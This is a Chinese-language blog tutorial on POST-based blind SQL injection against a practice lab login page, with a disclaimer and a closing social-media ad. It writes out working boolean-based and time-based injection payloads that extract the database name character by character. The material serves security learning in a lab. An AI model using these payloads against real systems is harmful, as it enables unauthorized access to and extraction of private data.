鲁迅先生曾经说过:做安全,先免责!
用户在使用本文信息时,应自行承担风险。本文不对用户因使用本文信息而导致的任何直接或间接损失承担责任。
本文主要内容:盲注注入(POST型)
PS:POST型与GET型注入流程相同,只是提交方式不同。如果有不理解的地方,建议回看GET型注入。
POST型盲注
手工盲注原本就很麻烦,而且GET型与POST型基本上无差别,这里简单带过。如果不理解,建议回看GET型盲注的内容。
布尔盲注
使用靶场第15节
判断是否存在盲注
参数:uname=ad' or 1=1 #&passwd=admin&Submit=Submit
参数:uname=ad' or 1=2 #&passwd=admin&Submit=Submit
小结:or后条件为真时,页面正常登录,or后条件为假时,页面登录失败。存在真假值,因此可以使用布尔盲注。
判断数据库名称
这里只判断数据库名称的首字母,其余的判断,可以参照GET型布尔盲注内容进行测试。
参数:uname=ad' or ascii(substr((select database()),1,1)) = 115 #&passwd=admin&Submit=Submit
时间盲注
更多详细内容参考GET型时间盲注。使用靶场第15节
参数:uname=ad' or if(ascii(substr((select database()),1,1)) = 115,sleep(0),sleep(5)) #&passwd=admin&Submit=Submit
if的第一个参数条件为真,则执行sleep(0),页面立即加载,如果if第一个参数为假,则执行sleep(5),页面加载时间变长。
无情的广告时间
哈哈哈哈,又到了大家喜欢的广告时间了,公众号:编码魔坊,喜欢的话给个关注呗,点击下方小卡片,扫码即可关注,谢谢您的关注!!!
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
